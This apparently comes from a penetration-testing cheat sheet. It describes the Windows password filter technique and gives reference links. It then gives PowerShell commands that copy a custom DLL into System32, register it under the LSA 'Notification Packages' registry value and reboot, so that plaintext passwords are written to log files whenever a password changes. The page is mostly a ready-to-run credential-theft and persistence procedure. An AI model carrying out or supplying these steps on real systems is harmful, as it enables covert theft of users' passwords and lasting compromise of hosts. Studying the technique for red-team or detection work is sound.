Comment on page
Password Filter

​https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/​
​https://github.com/clymb3r/Misc-Windows-Hacking/tree/master/HookPasswordChange​
​https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/​
​https://github.com/3gstudent/PasswordFilter​
Abuse PasswordChangeNotify to load a custom DLL capturing plaintext credentials when a password change is performed (the passwords will appear in C:\logFile?.txt files):
PS > $passwordFilterName = (Copy-Item "Win32Project3.dll" -Destination "C:\Windows\System32" -PassThru).basename
PS > $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
PS > $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
PS > $notificationPackagesValues += $passwordFilterName
PS > Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
PS > Restart-Computer -Confirm
Last modified 2yr ago